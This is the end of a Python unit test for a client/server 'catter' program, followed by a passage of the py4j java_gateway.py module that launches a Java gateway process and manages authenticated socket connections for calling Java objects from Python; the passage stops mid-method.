time.sleep(1.0/4)
self.clproc.stdin.write("TEST1")
time.sleep(1.0/4)
# Remove the signal handler
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
# Let the server exit
time.sleep(1.0/2)
self.clproc.stdin.write("TEST2")
self.clproc.stdin.close()
time.sleep(1.0/4)
self.assertEqual(self.svproc.stdout.read(), "TEST1TEST2")
# Make sure they both go down in a reasonable time
# TODO(dreiss): Factor out subprocs?
def sigalrm_handler(signum, frame):
raise Exception("waitpid timed out")
signal.signal(signal.SIGALRM, sigalrm_handler)
signal.alarm(1)
self.assertEqual(self.svproc.wait(), 0)
self.assertEqual(self.clproc.wait(), 0)
self.svproc = None
self.clproc = None
signal.alarm(0)
signal.signal(signal.SIGALRM, signal.SIG_DFL)
class SyncCatterTest(CatterTest):
client = "sync_catter"
# The evhttp test relies on some really new features of libevent,
# so allow it to be disabled independently.
if os.environ.get("NO_HTTP_TEST", False):
del EvhttpTest
if __name__ == "__main__":
unittest.main()
|
java_gateway.py
|
# -*- coding: UTF-8 -*-
"""Module to interact with objects in a Java Virtual Machine from a
Python Virtual Machine.
Variables that might clash with the JVM start with an underscore
(Java Naming Convention do not recommend to start with an underscore
so clashes become unlikely).
Created on Dec 3, 2009
:author: Barthelemy Dagenais
"""
from __future__ import unicode_literals, absolute_import
from collections import deque
import logging
import os
from pydoc import pager
import select
import socket
import struct
from subprocess import Popen, PIPE
import subprocess
import sys
import traceback
from threading import Thread, RLock
import weakref
from py4j.compat import (
range, hasattr2, basestring, CompatThread, Queue, WeakSet)
from py4j.finalizer import ThreadSafeFinalizer
from py4j import protocol as proto
from py4j.protocol import (
Py4JError, Py4JJavaError, Py4JNetworkError,
Py4JAuthenticationError,
get_command_part, get_return_value,
register_output_converter, smart_decode, escape_new_line,
is_fatal_error, is_error, unescape_new_line,
get_error_message, compute_exception_message)
from py4j.signals import Signal
from py4j.version import __version__
class NullHandler(logging.Handler):
def emit(self, record):
pass
null_handler = NullHandler()
logging.getLogger("py4j").addHandler(null_handler)
logger = logging.getLogger("py4j.java_gateway")
BUFFER_SIZE = 4096
DEFAULT_ADDRESS = "127.0.0.1"
DEFAULT_PORT = 25333
DEFAULT_PYTHON_PROXY_PORT = 25334
DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER = "DEFAULT"
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = 5
PY4J_SKIP_COLLECTIONS = "PY4J_SKIP_COLLECTIONS"
PY4J_TRUE = set(["yes", "y", "t", "true"])
server_connection_stopped = Signal()
"""Signal sent when a Python (Callback) Server connection is stopped.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_started = Signal()
"""Signal sent when a Python (Callback) Server connection is started.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_error = Signal()
"""Signal sent when a Python (Callback) Server encounters an error while
waiting for a connection.
Will supply the ``error`` argument, an instance of Exception.
The sender is the CallbackServer instance.
"""
server_started = Signal()
"""Signal sent when a Python (Callback) Server is started
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
server_stopped = Signal()
"""Signal sent when a Python (Callback) Server is stopped
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
pre_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is about to shut down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
post_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is shutted down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
def get_create_new_process_group_kwargs():
"""Ensures that the child process is created in another process group.
This prevents signals such as SIGINT from propagating to the JVM.
"""
if os.name != "nt":
kwargs = {"preexec_fn": os.setpgrp}
else:
kwargs = {"creationflags": subprocess.CREATE_NEW_PROCESS_GROUP}
return kwargs
def set_reuse_address(server_socket):
"""Sets reuse address option if not on windows.
On windows, the SO_REUSEADDR option means that multiple server sockets can
be bound to the same address (it has nothing to do with TIME_WAIT).
"""
if os.name != "nt":
server_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def set_default_callback_accept_timeout(accept_timeout):
"""Sets default accept timeout of callback server.
"""
deprecated("set_default_callback_accept_timeout", "1.0",
"CallbackServerParameters")
global DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = accept_timeout
def deprecated(name, last_version, use_instead="", level=logging.DEBUG,
raise_exc=False):
if not use_instead:
msg = "{0} is deprecated and will be removed in version {1}"\
.format(name, last_version)
else:
msg = "{0} is deprecated and will be removed in version {1}. "\
"Use {2} instead."\
.format(name, last_version, use_instead)
logger.log(level, msg)
if raise_exc:
raise DeprecationWarning(msg)
def java_import(jvm_view, import_str):
"""Imports the package or class specified by `import_str` in the
jvm view namespace.
:param jvm_view: The jvm_view in which to import a class/package.
:import_str: The class (e.g., java.util.List) or the package
(e.g., java.io.*) to import
"""
gateway_client = jvm_view._gateway_client
command = proto.JVMVIEW_COMMAND_NAME + proto.JVM_IMPORT_SUB_COMMAND_NAME +\
jvm_view._id + "\n" + escape_new_line(import_str) + "\n" +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
return_value = get_return_value(answer, gateway_client, None, None)
return return_value
def find_jar_path():
"""Tries to find the path where the py4j jar is located.
"""
paths = []
jar_file = "py4j{0}.jar".format(__version__)
maven_jar_file = "py4j-{0}.jar".format(__version__)
paths.append(jar_file)
# ant
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../py4j-java/" + jar_file))
# maven
paths.append(os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"../../../py4j-java/target/" + maven_jar_file))
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../share/py4j/" + jar_file))
paths.append("../../../current-release/" + jar_file)
paths.append(os.path.join(sys.prefix, "share/py4j/" + jar_file))
# pip install py4j # On Ubuntu 16.04, where virtualenvepath=/usr/local
# this file is here:
# virtualenvpath/lib/pythonX/dist-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
# pip install --user py4j # On Ubuntu 16.04, where virtualenvepath=~/.local
# this file is here:
# virtualenvpath/lib/pythonX/site-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../../share/py4j/" + jar_file))
for path in paths:
if os.path.exists(path):
return path
return ""
def launch_gateway(port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True,
java_path="java", create_new_process_group=False,
enable_auth=False):
"""Launch a `Gateway` in a new Java process.
The redirect parameters accept file-like objects, Queue, or deque. When
text lines are sent to the stdout or stderr of the child JVM, these lines
are redirected to the file-like object (``write(line)``), the Queue
(``put(line)``), or the deque (``appendleft(line)``).
The text line will contain a newline character.
Only text output is accepted on stdout and stderr. If you wish to
communicate with the child JVM through bytes, you need to create your own
helper function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the classpath
should be specified using the `classpath` parameter, not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout. If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param redirect_stderr: where to redirect the JVM stdout. If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time to
these objects.
:param daemonize_redirect: if True, the consumer threads will be daemonized
and will not prevent the main Python process from exiting. This means
the file descriptors (stderr, stdout, redirect_stderr, redirect_stdout)
might not be properly closed. This is not usually a problem, but in
case of errors related to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if $JAVA_HOME
is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies, the
Java process will stay alive, which may be a problem for some scenarios
though.
:param enable_auth: If True, the server will require clients to provide an
authentication token when connecting.
:rtype: the port number of the `Gateway` server or, when auth enabled,
a 2-tuple with the port number and the auth token.
"""
popen_kwargs = {}
if not jarpath:
jarpath = find_jar_path()
if not java_path:
java_home = os.environ.get("JAVA_HOME")
if java_home:
java_path = os.path.join(java_home, "bin", "java")
else:
java_path = "java"
# Fail if the jar does not exist.
if not os.path.exists(jarpath):
raise Py4JError("Could not find py4j jar at {0}".format(jarpath))
# Launch the server in a subprocess.
classpath = os.pathsep.join((jarpath, classpath))
command = [java_path, "-classpath", classpath] + javaopts + \
["py4j.GatewayServer"]
if die_on_exit:
command.append("--die-on-broken-pipe")
if enable_auth:
command.append("--enable-auth")
command.append(str(port))
logger.debug("Launching gateway with command {0}".format(command))
# stderr redirection
close_stderr = False
if redirect_stderr is None:
stderr = open(os.devnull, "w")
close_stderr = True
elif isinstance(redirect_stderr, Queue) or\
isinstance(redirect_stderr, deque):
stderr = PIPE
else:
stderr = redirect_stderr
# we don't need this anymore
redirect_stderr = None
# stdout redirection
if redirect_stdout is None:
redirect_stdout = open(os.devnull, "w")
if create_new_process_group:
popen_kwargs.update(get_create_new_process_group_kwargs())
proc = Popen(command, stdout=PIPE, stdin=PIPE, stderr=stderr,
**popen_kwargs)
# Determine which port the server started on (needed to support
# ephemeral ports)
_port = int(proc.stdout.readline())
# Read the auth token from the server if enabled.
_auth_token = None
if enable_auth:
_auth_token = proc.stdout.readline()[:-1]
# Start consumer threads so process does not deadlock/hangs
OutputConsumer(
redirect_stdout, proc.stdout, daemon=daemonize_redirect).start()
if redirect_stderr is not None:
OutputConsumer(
redirect_stderr, proc.stderr, daemon=daemonize_redirect).start()
ProcessConsumer(proc, [redirect_stdout], daemon=daemonize_redirect).start()
if close_stderr:
# XXX This will quiet ResourceWarning in Python 3.5+
# This only close the fd in this process, not in the JVM process, which
# makes sense.
quiet_close(stderr)
if enable_auth:
return (_port, _auth_token)
else:
return _port
def get_field(java_object, field_name):
"""Retrieves the field named `field_name` from the `java_object`.
This function is useful when `auto_field=false` in a gateway or
Java object.
:param java_object: the instance containing the field
:param field_name: the name of the field to retrieve
"""
command = proto.FIELD_COMMAND_NAME + proto.FIELD_GET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
else:
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def set_field(java_object, field_name, value):
"""Sets the field named `field_name` of `java_object` to `value`.
This function is the only way to set a field because the assignment
operator in Python cannot be overloaded.
:param java_object: the instance containing the field
:param field_name: the name of the field to set
:param value: the value to assign to the field
"""
command_part = get_command_part(
value,
java_object._gateway_client.gateway_property.pool)
command = proto.FIELD_COMMAND_NAME + proto.FIELD_SET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
command_part + proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def get_method(java_object, method_name):
"""Retrieves a reference to the method of an object.
This function is useful when `auto_field=true` and an instance field has
the same name as a method. The full signature of the method is not
required: it is determined when the method is called.
:param java_object: the instance containing the method
:param method_name: the name of the method to retrieve
"""
return JavaMember(
method_name, java_object, java_object._target_id,
java_object._gateway_client)
def is_instance_of(gateway, java_object, java_class):
"""Indicates whether a java object is an instance of the provided
java_class.
:param gateway: the JavaGateway instance
:param java_object: the JavaObject instance
:param java_class: can be a string (fully qualified name), a JavaClass
instance, or a JavaObject instance)
"""
if isinstance(java_class, basestring):
param = java_class
elif isinstance(java_class, JavaClass):
param = java_class._fqn
elif isinstance(java_class, JavaObject):
param = java_class.getClass()
else:
raise Py4JError(
"java_class must be a string, a JavaClass, or a JavaObject")
return gateway.jvm.py4j.reflection.TypeUtil.isInstanceOf(
param, java_object)
def get_java_class(java_class):
"""Returns the java.lang.Class of a JavaClass. This is equivalent to
calling .class in Java.
:param java_class: An instance of JavaClass
:rtype: An instance of JavaObject that corresponds to a java.lang.Class
"""
return java_class._java_lang_class
def quiet_close(closable):
"""Quietly closes a closable object without throwing an exception.
:param closable: Object with a ``close`` method.
"""
if closable is None:
# Do not attempt to close a None. This logs unecessary exceptions.
return
try:
closable.close()
except Exception:
logger.debug("Exception while closing", exc_info=True)
def quiet_shutdown(socket_instance):
"""Quietly shuts down a socket without throwing an exception.
:param socket_instance: Socket with ``shutdown`` method.
"""
if socket_instance is None:
# Do not attempt to close a None. This logs unecessary exceptions.
return
try:
socket_instance.shutdown(socket.SHUT_RDWR)
except Exception:
logger.debug("Exception while shutting down a socket", exc_info=True)
def set_linger(a_socket):
"""Sets SO_LINGER to true, 0 to send a RST packet. This forcibly closes the
connection and the remote socket should fail on write and should not need
to read to realize that the socket was closed.
Only use on timeout and maybe shutdown because it does not terminate the
TCP connection normally.
"""
l_onoff = 1
l_linger = 0
a_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack(b'ii', l_onoff, l_linger))
def check_connection(a_socket, read_timeout):
"""Checks that a socket is ready to receive by reading from it.
If the read times out, this is a good sign. If the read returns an
empty string, this usually means that the socket was remotely closed.
:param a_socket: The socket to read from.
:param read_timeout: The read_timeout to restore the socket to.
"""
a_socket.settimeout(0.0001)
response = 0
try:
response = a_socket.recv(2)
except socket.timeout:
# Do nothing this is expected!
pass
finally:
a_socket.settimeout(read_timeout)
if response == b"":
raise Exception("The connection was remotely closed.")
def gateway_help(gateway_client, var, pattern=None, short_name=True,
display=True):
"""Displays a help page about a class or an object.
:param gateway_client: The gatway client
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get*Foo" may return getMyFoo, getFoo, getFooBar, but not bargetFoo.
The pattern is matched against the entire signature. To match only
the name of a method, use "methodName(*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
if hasattr2(var, "_get_object_id"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_OBJECT_SUBCOMMAND_NAME +\
var._get_object_id() + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "_fqn"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_CLASS_SUBCOMMAND_NAME +\
var._fqn + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "container") and hasattr2(var, "name"):
if pattern is not None:
raise Py4JError("pattern should be None with var is a JavaMember")
pattern = var.name + "(*"
var = var.container
return gateway_help(
gateway_client, var, pattern, short_name=short_name,
display=display)
else:
raise Py4JError(
"var is none of Java Object, Java Class or Java Member")
help_page = get_return_value(answer, gateway_client, None, None)
if (display):
pager(help_page)
else:
return help_page
def do_client_auth(command, input_stream, sock, auth_token):
"""Receives and decodes a auth token.
- If the token does not match, an exception is raised.
- If the command received is not an Auth command, an exception is raised.
- If an exception occurs, it is wrapped in a Py4JAuthenticationError.
- Otherwise, it returns True.
"""
try:
if command != proto.AUTH_COMMAND_NAME:
raise Py4JAuthenticationError("Expected {}, received {}.".format(
proto.AUTH_COMMAND_NAME, command))
client_token = smart_decode(input_stream.readline()[:-1])
# Remove the END marker
input_stream.readline()
if auth_token == client_token:
success = proto.OUTPUT_VOID_COMMAND.encode("utf-8")
sock.sendall(success)
else:
error = proto.ERROR_RETURN_MESSAGE.encode("utf-8")
# TODO AUTH Send error message with the error?
sock.sendall(error)
raise Py4JAuthenticationError("Client authentication failed.")
except Py4JAuthenticationError:
raise
except Exception as e:
logger.exception(
"An exception occurred while trying to authenticate "
"a connection")
raise Py4JAuthenticationError(cause=e)
return True
def _garbage_collect_object(gateway_client, target_id):
try:
ThreadSafeFinalizer.remove_finalizer(
smart_decode(gateway_client.address) +
smart_decode(gateway_client.port) +
target_id)
gateway_client.garbage_collect_object(target_id)
except Exception:
logger.debug("Exception while garbage collecting an object",
exc_info=True)
def _garbage_collect_connection(socket_instance):
"""Closes the socket if auto_delete is True and the socket is opened.
This is an acceptable practice if you know that your Python VM implements
garbage collection and closing sockets immediately is not a concern.
Otherwise, it is always better (because it is predictable) to explicitly
close the socket by calling `GatewayConnection.close()`.
"""
if socket_instance is not None:
quiet_shutdown(socket_instance)
quiet_close(socket_instance)
class OutputConsumer(CompatThread):
"""Thread that consumes output
"""
def __init__(self, redirect, stream, *args, **kwargs):
super(OutputConsumer, self).__init__(*args, **kwargs)
self.redirect = redirect
self.stream = stream
if isinstance(redirect, Queue):
self.redirect_func = self._pipe_queue
if isinstance(redirect, deque):
self.redirect_func = self._pipe_deque
if hasattr2(redirect, "write"):
self.redirect_func = self._pipe_fd
def _pipe_queue(self, line):
self.redirect.put(line)
def _pipe_deque(self, line):
self.redirect.appendleft(line)
def _pipe_fd(self, line):
self.redirect.write(line)
def run(self):
lines_iterator = iter(self.stream.readline, b"")
for line in lines_iterator:
self.redirect_func(smart_decode(line))
class ProcessConsumer(CompatThread):
"""Thread that ensures process stdout and stderr are properly closed.
"""
def __init__(self, proc, closable_list, *args, **kwargs):
super(ProcessConsumer, self).__init__(*args, **kwargs)
self.proc = proc
if closable_list:
# We don't care if it contains queues or deques, quiet_close will
# just ignore them.
self.closable_list = closable_list
else:
self.closable_list = []
def run(self):
self.proc.wait()
quiet_close(self.proc.stdout)
quiet_close(self.proc.stderr)
for closable in self.closable_list:
quiet_close(closable)
class GatewayParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `JavaGateway`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT, auto_field=False,
auto_close=True, auto_convert=False, eager_load=False,
ssl_context=None, enable_memory_management=True,
read_timeout=None, auth_token=None):
"""
:param address: the address to which the client will request a
connection. If you're assing a `SSLContext` with
`check_hostname=True` then this address must match
(one of) the hostname(s) in the certificate the gateway
server presents.
:param port: the port to which the client will request a connection.
Default is 25333.
:param auto_field: if `False`, each object accessed through this
gateway won"t try to lookup fields (they will be accessible only by
calling get_field). If `True`, fields will be automatically looked
up, possibly hiding methods of the same name and making method
calls less efficient.
:param auto_close: if `True`, the connections created by the client
close the socket when they are garbage collected.
:param auto_convert: if `True`, try to automatically convert Python
objects like sequences and maps to Java Objects. Default value is
`False` to improve performance and because it is still possible to
explicitly perform this conversion.
:param eager_load: if `True`, the gateway tries to connect to the JVM
by calling System.currentTimeMillis. If the gateway cannot connect
to the JVM, it shuts down itself and raises an exception.
:param ssl_context: if not None, SSL connections will be made using
this SSLContext
:param enable_memory_management: if True, tells the Java side when a
JavaObject (reference to an object on the Java side) is garbage
collected on the Python side.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a response from the Java side.
:param auth_token: if provided, an authentication that token clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.auto_field = auto_field
self.auto_close = auto_close
self.auto_convert = auto_convert
self.eager_load = eager_load
self.ssl_context = ssl_context
self.enable_memory_management = enable_memory_management
self.read_timeout = read_timeout
self.auth_token = escape_new_line(auth_token)
class CallbackServerParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `CallbackServer`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PYTHON_PROXY_PORT,
daemonize=False, daemonize_connections=False, eager_load=True,
ssl_context=None,
accept_timeout=DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER,
read_timeout=None, propagate_java_exceptions=False,
auth_token=None):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
Default is 25333.
:param daemonize: If `True`, will set the daemon property of the server
thread to True. The callback server will exit automatically if all
the other threads exit.
:param daemonize_connections: If `True`, callback server connections
are executed in daemonized threads and will not block the exit of a
program if non daemonized threads are finished.
:param eager_load: If `True`, the callback server is automatically
started when the JavaGateway is created.
:param ssl_context: if not None, the SSLContext's certificate will be
presented to callback connections.
:param accept_timeout: if > 0, sets a timeout in seconds after which
the callbackserver stops waiting for a connection, sees if the
callback server should shut down, and if not, wait again for a
connection. The default is 5 seconds: this roughly means that
if can take up to 5 seconds to shut down the callback server.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a call or command from the
Java side.
:param propagate_java_exceptions: if `True`, any `Py4JJavaError` raised
by a Python callback will cause the nested `java_exception` to be
thrown on the Java side. If `False`, the `Py4JJavaError` will
manifest as a `Py4JException` on the Java side, just as with any
other kind of Python exception. Setting this option is useful if
you need to implement a Java interface where the user of the
interface has special handling for specific Java exception types.
:param auth_token: if provided, an authentication token that clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.daemonize = daemonize
self.daemonize_connections = daemonize_connections
self.eager_load = eager_load
self.ssl_context = ssl_context
if accept_timeout == DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER:
# This is to support deprecated function call...
# TODO Remove "DEFAULT" once we remove the deprecated function
# call.
accept_timeout = DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
self.accept_timeout = accept_timeout
self.read_timeout = read_timeout
self.propagate_java_exceptions = propagate_java_exceptions
self.auth_token = escape_new_line(auth_token)
class DummyRLock(object):
def __init__(self):
pass
def acquire(self, blocking=1):
pass
def release(self):
pass
def __enter__(self):
pass
def __exit__(self, type, value, tb):
pass
class GatewayConnectionGuard(object):
def __init__(self, client, connection):
self._client = client
self._connection = connection
def __enter__(self):
return self
def read(self, hint=-1):
return self._connection.stream.read(hint)
def __exit__(self, type, value, traceback):
if value is None:
self._client._give_back_connection(self._connection)
else:
self._connection.close()
class GatewayClient(object):
"""Responsible for managing connections to the JavaGateway.
This implementation is thread-safe and connections are created on-demand.
This means that Py4J-Python can be accessed by multiple threads and
messages are sent to and processed concurrently by the Java Gateway.
When creating a custom :class:`JavaGateway`, it is recommended to pass an
instance of :class:`GatewayClient` instead of a :class:`GatewayConnection`:
both have the same interface, but the client supports multiple threads and
connections, which is essential when using callbacks. """
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT,
auto_close=True, gateway_property=None,
ssl_context=None, gateway_parameters=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: used to keep gateway preferences without a
cycle with the gateway
"""
if address != DEFAULT_ADDRESS:
deprecated("GatewayClient.address", "1.0", "GatewayParameters")
if port != DEFAULT_PORT:
deprecated("GatewayClient.port", "1.0", "GatewayParameters")
if not gateway_parameters:
gateway_parameters = GatewayParameters(
address=address, port=port, auto_close=auto_close,
ssl_context=ssl_context)
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
self.is_connected = True
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.ssl_context = gateway_parameters.ssl_context
self.deque = deque()
def garbage_collect_object(self, target_id):
"""Tells the Java side that there is no longer a reference to this
JavaObject on the Python side.
"""
if target_id != proto.ENTRY_POINT_OBJECT_ID and\
target_id != proto.GATEWAY_SERVER_OBJECT_ID and\
self.is_connected:
try:
self.send_command(
proto.MEMORY_COMMAND_NAME +
proto.MEMORY_DEL_SUBCOMMAND_NAME +
target_id +
"\ne\n")
except Exception:
logger.debug("Exception while garbage collecting an object",
exc_info=True)
def _get_connection(self):
if not self.is_connected:
raise Py4JNetworkError("Gateway is not connected.")
try:
connection = self.deque.pop()
except IndexError:
connection = self._create_connection()
return connection
def _create_connection(self):
connection = GatewayConnection(
self.gateway_parameters, self.gateway_property)
connection.start()
return connection
def _give_back_connection(self, connection):
try:
self.deque.append(connection)
except Exception:
logger.warning(
"Exception while giving back connection", exc_info=True)
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the
gateway server: all active connections will be closed. This may
be useful if the lifecycle of the Java program must be tied to
the Python program.
"""
connection = self._get_connection()
try:
connection.shutdown_gateway()
self.close()
self.is_connected = False
except Py4JNetworkError:
logger.debug("Error while shutting down gateway.", exc_info=True)
self.shutdown_gateway()
def send_command(self, command, retry=True, binary=False):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users. It is usually called by
:class:`JavaMember` instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:param retry: if `True`, the GatewayClient tries to resend a message
if it fails.
:param binary: if `True`, we won't wait for a Py4J-protocol response
from the other end; we'll just return the raw connection to the
caller. The caller becomes the owner of the connection, and is
responsible for closing the connection (or returning it this
`GatewayClient` pool using `_give_back_connection`).
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol). The guarded `GatewayConnection` is also returned
if `binary` is `True`.
"""
connection = self._get_connection()
try:
response = connection.send_command(command)
if binary:
return response, self._create_connection_guard(connection)
elif is_fatal_error(response):
connection.close(False)
else:
self._give_back_connection(connection)
except Py4JNetworkError as pne:
if connection:
reset = False
if isinstance(pne.cause, socket.timeout):
reset = True
connection.close(reset)
if self._should_retry(retry, connection, pne):
logging.info("Exception while sending command.", exc_info=True)
response = self.send_command(command, binary=binary)
else:
logging.exception(
"Exception while sending command.")
response = proto.ERROR
return response
def _create_connection_guard(self, connection):
return GatewayConnectionGuard(self, connection)
def _should_retry(self, retry, connection, pne=None):
return pne and pne.when == proto.ERROR_ON_SEND
def close(self):
"""Closes all currently opened connections.
This operation is not thread safe and is only a best effort strategy
to close active connections.
All connections are guaranteed to be closed only if no other thread
is accessing the client and no call is pending.
"""
size = len(self.deque)
for _ in range(0, size):
try:
connection = self.deque.pop()
quiet_close(connection)
except IndexError:
pass
class GatewayConnection(object):
"""Default gateway connection (socket based) responsible for communicating
with the Java Virtual Machine."""
def __init__(self, gateway_parameters, gateway_property=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: contains gateway preferences to avoid a cycle
with gateway
"""
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.socket = socket.socket(af_type, socket.SOCK_STREAM)
if gateway_parameters.read_timeout:
self.socket.settimeout(gateway_parameters.read_timeout)
if gateway_parameters.ssl_context:
self.socket = gateway_parameters.ssl_context.wrap_socket(
self.socket, server_hostname=self.address)
self.is_connected = False
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.wr = weakref.ref(
self,
lambda wr, socket_instance=self.socket:
_garbage_collect_connection and
_garbage_collect_connection(socket_instance))
def start(self):
"""Starts the connection by connecting to the `address` and the `port`
"""
try:
self.socket.connect((self.address, self.port))
self.stream = self.socket.makefile("rb")
self.is_connected = True
self._authenticate_connection()
except Py4JAuthenticationError:
logger.exception("Cannot authenticate with gateway server.")
raise
except Exception as e:
msg = "An error occurred while trying to connect to the Java "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
def _authenticate_connection(self):
if self.gateway_parameters.auth_token:
cmd = "{0}\n{1}\n".format(
proto.AUTH_COMMAND_NAME,
self.gateway_parameters.auth_token
)
answer = self.send_command(cmd)
error, _ = proto.is_error(answer)
if error:
# At this point we do not expect the caller to clean
# the connection so we clean ourselves.
self.close(reset=True)
raise Py4JAuthenticationError(
"Failed to authenticate with gateway server.")
def close(self, reset=False):
"""Closes the connection by closing the socket.
If reset is True, sends a RST packet with SO_LINGER
"""
if reset:
set_linger(self.socket)
else:
# Sent shut down before attempting to close a stream or socket.
quiet_shutdown(self.socket)
quiet_close(self.stream)
quiet_close(self.socket)
self.is_connected = False
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the gateway
server: all active connections will be closed. This may be useful
if the lifecycle of the Java program must be tied to the Python
program.
"""
if not self.is_connected:
raise Py4JError("Gateway must be connected to send shutdown cmd.")
try:
quiet_close(self.stream)
self.socket.sendall(
proto.SHUTDOWN_GATEWAY_COMMAND_NAME.encode("utf-8"))
quiet_close(self.socket)
self.is_connected = False
except Exception:
# Do nothing! Exceptions might occur anyway.
logger.debug("Exception occurred while shutting down gateway",
exc_info=True)
def send_command(self, command):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users: it is usually called by JavaMember
instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol).
"""
logger.debug("Command to send: {0}".format(command))
try:
# Write will only fail if remote is closed for large payloads or
# if it sent a RST packet (SO_LINGER)
self.socket.sendall(command.encode("utf-8"))
except Exception as e:
logger.info("Error while sending.", exc_info=True)
raise Py4JNetworkError(
"Error while sending", e, proto.ERROR_ON_SEND)
try:
answer = smart_decode(self.stream.readline()[:-1])
logger.debug("Answer received: {0}".format(answer))
if answer.startswith(proto.RETURN_MESSAGE):
answer = answer[1:]
# Happens when a the other end is dead. There might be an empty
# answer before the socket raises an error.
if answer.strip() == "":
